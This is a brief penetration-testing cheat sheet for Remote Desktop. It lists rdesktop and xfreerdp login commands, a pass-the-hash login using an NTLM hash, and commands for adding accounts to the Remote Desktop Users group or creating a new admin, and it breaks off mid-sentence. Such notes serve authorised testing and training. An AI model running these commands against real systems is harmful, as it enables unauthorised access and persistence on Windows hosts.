-
Enumeration Mandatory Try to connect within a window manager:rdesktop $target Optional If you have shell acess, try to create a new user account which is in the group Remote Desktop Users or add this group to an existing user.
-
Use rdesktop for a normal login rdesktop $target Normal login for a local user xfreerdp /cert-ignore /u:user /p:pass /v:$target Login for a domain user xfreerdp /cert-ignore /u:user /d:dom.com /p:pass /v:1$target To log in with a NTML hash, use xfreerdp. xfreerdp /u:Peter /pth:666fb5b812a486f87062670c3baf1852 /v:$target Activate net localgroup "Remote Desktop Users" Administrator /add Create a new admin and enable…